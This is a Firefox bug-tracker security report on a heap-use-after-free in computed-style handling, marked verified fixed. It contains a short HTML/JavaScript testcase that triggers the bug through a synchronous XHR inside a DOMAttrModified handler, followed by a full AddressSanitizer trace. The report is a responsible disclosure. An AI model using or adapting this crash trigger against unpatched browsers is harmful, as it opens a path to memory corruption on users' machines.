heap-use-after-free in nsComputedDOMStyle::UpdateCurrentStyleSources

VERIFIED FIXED in Firefox -esr52

Status

()

defect
VERIFIED FIXED
2 years ago
9 months ago

People

(Reporter: nils, Assigned: emilio)

Tracking

(5 keywords)

58 Branch
mozilla58
Points:
---
Dependency tree / graph
Bug Flags:
sec-bounty +

Firefox Tracking Flags

(firefox-esr5257+ verified, firefox56 wontfix, firefox57+ verified, firefox58+ verified, firefox59 verified)

Details

(Whiteboard: [adv-main57+][adv-esr52.5+][post-critsmash-triage])

Attachments

(4 attachments)

Reporter

Description

2 years ago
Posted file crash.html
The following testcase crashes the latest ASAN build of Firefox (BuildID=20171026221048)

crash.html:
<script>
function spin () {
    var x=new XMLHttpRequest();
    x.open("POST","https://mozilla.org",false);
    x.send("X");
}
function start() {
	o1=window.open('x','p6','height=0');
	o3=document.documentElement;
	o7=document.createElement('marquee');
	o3.addEventListener('DOMAttrModified',fun0);
	o3.appendChild(o7);
	o1.getComputedStyle(o3).color;
}
function fun0() {
	spin();
}
</script>
<body onload="start()"></body>

ASAN output:
=================================================================
==10774==ERROR: AddressSanitizer: heap-use-after-free on address 0x62200003f110 at pc 0x7f067e63da87 bp 0x7fff53791690 sp 0x7fff53791688
READ of size 8 at 0x62200003f110 thread T0 (file:// Content)
    #0 0x7f067e63da86 in get /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:287:27
    #1 0x7f067e63da86 in operator nsPresContext * /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:300
    #2 0x7f067e63da86 in GetPresContext /builds/worker/workspace/build/src/obj-firefox/dist/include/nsIPresShell.h:254
    #3 0x7f067e63da86 in nsComputedDOMStyle::UpdateCurrentStyleSources(bool) /builds/worker/workspace/build/src/layout/style/nsComputedDOMStyle.cpp:978
    #4 0x7f067e63e161 in nsComputedDOMStyle::GetPropertyCSSValue(nsTSubstring<char16_t> const&, mozilla::ErrorResult&) /builds/worker/workspace/build/src/layout/style/nsComputedDOMStyle.cpp:1165:3
    #5 0x7f067e63bd48 in nsComputedDOMStyle::GetPropertyValue(nsTSubstring<char16_t> const&, nsTSubstring<char16_t>&) /builds/worker/workspace/build/src/layout/style/nsComputedDOMStyle.cpp:479:26
    #6 0x7f067e63bb58 in nsComputedDOMStyle::GetPropertyValue(nsCSSPropertyID, nsTSubstring<char16_t>&) /builds/worker/workspace/build/src/layout/style/nsComputedDOMStyle.cpp:415:10
    #7 0x7f067aba3396 in GetColor /builds/worker/workspace/build/src/layout/style/nsCSSPropList.h:1439:1
    #8 0x7f067aba3396 in mozilla::dom::CSS2PropertiesBinding::get_color(JSContext*, JS::Handle<JSObject*>, nsDOMCSSDeclaration*, JSJitGetterCallArgs) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/CSS2PropertiesBinding.cpp:12880
    #9 0x7f067c34b156 in mozilla::dom::GenericBindingGetter(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2909:13
    #10 0x7f06829577f0 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
    #11 0x7f06829577f0 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:473
    #12 0x7f06829597c5 in InternalCall /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:522:12
    #13 0x7f06829597c5 in Call /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:541
    #14 0x7f06829597c5 in js::CallGetter(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:656
    #15 0x7f06838ea68c in CallGetter /builds/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2119:16
    #16 0x7f06838ea68c in GetExistingProperty<js::AllowGC::CanGC> /builds/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2172
    #17 0x7f06838ea68c in NativeGetPropertyInline<js::AllowGC::CanGC> /builds/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2375
    #18 0x7f06838ea68c in js::NativeGetProperty(JSContext*, JS::Handle<js::NativeObject*>, JS::Handle<JS::Value>, JS::Handle<jsid>, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2411
    #19 0x7f068339776c in GetProperty /builds/worker/workspace/build/src/js/src/vm/NativeObject.h:1601:12
    #20 0x7f068339776c in JS_ForwardGetPropertyTo(JSContext*, JS::Handle<JSObject*>, JS::Handle<jsid>, JS::Handle<JS::Value>, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2707
    #21 0x7f067c34339f in mozilla::dom::GetPropertyOnPrototype(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::Handle<jsid>, bool*, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2096:10
    #22 0x7f067aaeecb6 in mozilla::dom::CSS2PropertiesBinding::DOMProxyHandler::get(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::Handle<jsid>, JS::MutableHandle<JS::Value>) const /builds/worker/workspace/build/src/obj-firefox/dom/bindings/CSS2PropertiesBinding.cpp:65860:8
    #23 0x7f068361ec20 in getInternal /builds/worker/workspace/build/src/js/src/proxy/Proxy.cpp:353:21
    #24 0x7f068361ec20 in js::Proxy::get(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::Handle<jsid>, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/proxy/Proxy.cpp:363
    #25 0x7f068296225b in GetProperty /builds/worker/workspace/build/src/js/src/vm/NativeObject.h:1600:16
    #26 0x7f068296225b in GetProperty /builds/worker/workspace/build/src/js/src/jsobj.h:806
    #27 0x7f068296225b in js::GetProperty(JSContext*, JS::Handle<JS::Value>, JS::Handle<js::PropertyName*>, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:4393
    #28 0x7f0682944c98 in GetPropertyOperation /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:219:12
    #29 0x7f0682944c98 in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2786
    #30 0x7f068292a14a in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:423:12
    #31 0x7f06829578ef in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:495:15
    #32 0x7f06829587e2 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:541:10
    #33 0x7f068339d16b in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:3020:12
    #34 0x7f067bd697e5 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:260:37
    #35 0x7f067c761e1d in Call<nsISupports *> /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:362:12
    #36 0x7f067c761e1d in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:215
    #37 0x7f067c72ab46 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1118:51
    #38 0x7f067c72cd12 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1293:20
    #39 0x7f067c70c3f1 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:462:16
    #40 0x7f067c70f8c2 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:822:9
    #41 0x7f067e9cf5ce in nsDocumentViewer::LoadComplete(nsresult) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1064:7
    #42 0x7f06819eaafa in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7759:21
    #43 0x7f06819e6b24 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7557:7
    #44 0x7f06819ee37f in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7454:13
    #45 0x7f0679638ba3 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1320:3
    #46 0x7f0679637d0c in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:861:14
    #47 0x7f0679634d98 in nsDocLoader::DocLoaderIsEmpty(bool) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:750:9
    #48 0x7f0679636cb2 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:632:5
    #49 0x7f067963790c in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:488:14
    #50 0x7f0677bc7c40 in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:629:28
    #51 0x7f067a7f8f9d in nsDocument::DoUnblockOnload() /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:9331:18
    #52 0x7f067a7f8b61 in nsDocument::UnblockOnload(bool) /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:9253:9
    #53 0x7f067a7d2c39 in nsDocument::DispatchContentLoadedEvents() /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:5645:3
    #54 0x7f067a84bf72 in applyImpl<nsDocument, void (nsDocument::*)()> /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1142:12
    #55 0x7f067a84bf72 in apply<nsDocument, void (nsDocument::*)()> /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1148
    #56 0x7f067a84bf72 in mozilla::detail::RunnableMethodImpl<nsDocument*, void (nsDocument::*)(), true, (mozilla::RunnableKind)0>::Run() /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1192
    #57 0x7f06779f0f01 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:396:25
    #58 0x7f0677a15f26 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1037:14
    #59 0x7f0677a303e8 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:513:10
    #60 0x7f0678802281 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
    #61 0x7f06787627bb in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #62 0x7f06787627bb in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #63 0x7f06787627bb in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #64 0x7f067e176c7f in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:158:27
    #65 0x7f06826a8e97 in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:877:22
    #66 0x7f06787627bb in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #67 0x7f06787627bb in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #68 0x7f06787627bb in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #69 0x7f06826a884a in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:703:34
    #70 0x4ec2de in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:63:30
    #71 0x4ec2de in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:280
    #72 0x7f069532582f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #73 0x41dbc8 in _start (/fuzzer3/firefox/firefox+0x41dbc8)

0x62200003f110 is located 16 bytes inside of 5768-byte region [0x62200003f100,0x622000040788)
freed by thread T0 (file:// Content) here:
    #0 0x4bc0fb in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:47:3
    #1 0x7f067e8cd67e in mozilla::PresShell::Release() /builds/worker/workspace/build/src/layout/base/PresShell.cpp:841:1
    #2 0x7f067e9d712b in assign_assuming_AddRef /builds/worker/workspace/build/src/obj-firefox/dist/include/nsCOMPtr.h:355:7
    #3 0x7f067e9d712b in operator= /builds/worker/workspace/build/src/obj-firefox/dist/include/nsCOMPtr.h:631
    #4 0x7f067e9d712b in nsDocumentViewer::DestroyPresShell() /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:4645
    #5 0x7f067e9c754c in nsDocumentViewer::Destroy() /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1752:5
    #6 0x7f067e9d8fae in nsDocumentViewer::Show() /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:2089:17
    #7 0x7f067ea69deb in nsPresContext::EnsureVisible() /builds/worker/workspace/build/src/layout/base/nsPresContext.cpp:2241:31
    #8 0x7f067e8ef353 in mozilla::PresShell::UnsuppressAndInvalidate() /builds/worker/workspace/build/src/layout/base/PresShell.cpp:3892:54
    #9 0x7f067e8da167 in UnsuppressPainting /builds/worker/workspace/build/src/layout/base/PresShell.cpp:3935:5
    #10 0x7f067e8da167 in mozilla::PresShell::sPaintSuppressionCallback(nsITimer*, void*) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:1861
    #11 0x7f0677a35196 in nsTimerImpl::Fire(int) /builds/worker/workspace/build/src/xpcom/threads/nsTimerImpl.cpp:701:7
    #12 0x7f0677a071f6 in nsTimerEvent::Run() /builds/worker/workspace/build/src/xpcom/threads/TimerThread.cpp:286:11
    #13 0x7f06779f0f01 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:396:25
    #14 0x7f0677a15f26 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1037:14
    #15 0x7f0677a303e8 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:513:10
    #16 0x7f067dfb9f57 in SpinEventLoopUntil<mozilla::ProcessFailureBehavior::ReportToCaller, (lambda at /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:3106:31)> /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:323:25
    #17 0x7f067dfb9f57 in mozilla::dom::XMLHttpRequestMainThread::SendInternal(mozilla::dom::BodyExtractorBase const*) /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:3106
    #18 0x7f067dfbb77c in mozilla::dom::XMLHttpRequestMainThread::Send(JSContext*, mozilla::dom::Nullable<mozilla::dom::DocumentOrBlobOrArrayBufferViewOrArrayBufferOrFormDataOrURLSearchParamsOrUSVString> const&, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:2935:11
    #19 0x7f067bb89f7f in mozilla::dom::XMLHttpRequestBinding::send(JSContext*, JS::Handle<JSObject*>, mozilla::dom::XMLHttpRequest*, JSJitMethodCallArgs const&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/XMLHttpRequestBinding.cpp:1249:9
    #20 0x7f067c34d570 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3040:13
    #21 0x7f06829577f0 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
    #22 0x7f06829577f0 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:473
    #23 0x7f0682942447 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:528:12
    #24 0x7f0682942447 in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3067
    #25 0x7f068292a14a in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:423:12
    #26 0x7f06829578ef in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:495:15
    #27 0x7f06829587e2 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:541:10
    #28 0x7f068339d16b in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:3020:12
    #29 0x7f067bd6c7c7 in mozilla::dom::EventListener::HandleEvent(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, mozilla::ErrorResult&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventListenerBinding.cpp:47:8
    #30 0x7f067c72ab0c in HandleEvent<mozilla::dom::EventTarget *> /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventListenerBinding.h:65:12
    #31 0x7f067c72ab0c in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1115
    #32 0x7f067c72cd12 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1293:20
    #33 0x7f067c70c6ba in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:486:14
    #34 0x7f067c70f8c2 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:822:9
    #35 0x7f067c6deaba in mozilla::EventDispatcher::DispatchDOMEvent(nsISupports*, mozilla::WidgetEvent*, nsIDOMEvent*, nsPresContext*, nsEventStatus*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:891:12
    #36 0x7f067a8c20b1 in nsINode::DispatchEvent(nsIDOMEvent*, bool*) /builds/worker/workspace/build/src/dom/base/nsINode.cpp:1337:5

previously allocated by thread T0 (file:// Content) here:
    #0 0x4bc44c in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64:3
    #1 0x4ed85d in moz_xmalloc /builds/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:84:17
    #2 0x7f067a7bf033 in operator new /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:206:12
    #3 0x7f067a7bf033 in nsDocument::CreateShell(nsPresContext*, nsViewManager*, mozilla::StyleSetHandle) /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:4137
    #4 0x7f067e9c9e1f in nsDocumentViewer::InitPresentationStuff(bool) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:684:27
    #5 0x7f067e9c96ef in nsDocumentViewer::InitInternal(nsIWidget*, nsISupports*, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, bool, bool, bool) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:942:10
    #6 0x7f067e9c8957 in nsDocumentViewer::Init(nsIWidget*, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:659:10
    #7 0x7f06819e459b in nsDocShell::SetupNewViewer(nsIContentViewer*) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:9552:7
    #8 0x7f06819e2f5c in nsDocShell::Embed(nsIContentViewer*, char const*, nsISupports*) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7376:17
    #9 0x7f06819f19d8 in nsDocShell::CreateAboutBlankContentViewer(nsIPrincipal*, nsIURI*, bool, bool) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:8250:14
    #10 0x7f067a477cd5 in nsGlobalWindow::SetInitialPrincipalToSubject() /builds/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:2605:18
    #11 0x7f06826045b6 in nsWindowWatcher::OpenWindowInternal(mozIDOMWindowProxy*, char const*, char const*, char const*, bool, bool, bool, nsIArray*, bool, bool, nsIDocShellLoadInfo*, mozIDOMWindowProxy**) /builds/worker/workspace/build/src/toolkit/components/windowwatcher/nsWindowWatcher.cpp:1117:18
    #12 0x7f06826099df in OpenWindow2 /builds/worker/workspace/build/src/toolkit/components/windowwatcher/nsWindowWatcher.cpp:444:10
    #13 0x7f06826099df in non-virtual thunk to nsWindowWatcher::OpenWindow2(mozIDOMWindowProxy*, char const*, char const*, char const*, bool, bool, bool, nsISupports*, bool, bool, nsIDocShellLoadInfo*, mozIDOMWindowProxy**) /builds/worker/workspace/build/src/toolkit/components/windowwatcher/nsWindowWatcher.cpp:416
    #14 0x7f067a4c7145 in nsGlobalWindow::OpenInternal(nsTSubstring<char16_t> const&, nsTSubstring<char16_t> const&, nsTSubstring<char16_t> const&, bool, bool, bool, bool, bool, nsIArray*, nsISupports*, nsIDocShellLoadInfo*, bool, nsPIDOMWindowOuter**) /builds/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:12911:21
    #15 0x7f067a4c571f in OpenJS /builds/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:8966:10
    #16 0x7f067a4c571f in nsGlobalWindow::OpenOuter(nsTSubstring<char16_t> const&, nsTSubstring<char16_t> const&, nsTSubstring<char16_t> const&, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:8928
    #17 0x7f067a4c5bad in nsGlobalWindow::Open(nsTSubstring<char16_t> const&, nsTSubstring<char16_t> const&, nsTSubstring<char16_t> const&, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:8937:3
    #18 0x7f067babfc23 in mozilla::dom::WindowBinding::open(JSContext*, JS::Handle<JSObject*>, nsGlobalWindow*, JSJitMethodCallArgs const&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/WindowBinding.cpp:2192:56
    #19 0x7f067babdf85 in mozilla::dom::WindowBinding::genericMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/WindowBinding.cpp:15335:13
    #20 0x7f06829577f0 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
    #21 0x7f06829577f0 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:473
    #22 0x7f0682942447 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:528:12
    #23 0x7f0682942447 in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3067
    #24 0x7f068292a14a in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:423:12
    #25 0x7f06829578ef in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:495:15
    #26 0x7f06829587e2 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:541:10
    #27 0x7f068339d16b in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:3020:12
    #28 0x7f067bd697e5 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:260:37
    #29 0x7f067c761e1d in Call<nsISupports *> /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:362:12
    #30 0x7f067c761e1d in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:215
    #31 0x7f067c72ab46 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1118:51
    #32 0x7f067c72cd12 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1293:20
    #33 0x7f067c70c3f1 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:462:16
    #34 0x7f067c70f8c2 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:822:9
    #35 0x7f067e9cf5ce in nsDocumentViewer::LoadComplete(nsresult) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1064:7

SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:287:27 in get
Shadow bytes around the buggy address:
  0x0c447ffffdd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c447ffffde0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c447ffffdf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c447ffffe00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c447ffffe10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c447ffffe20: fd fd[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c447ffffe30: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c447ffffe40: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c447ffffe50: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c447ffffe60: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c447ffffe70: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
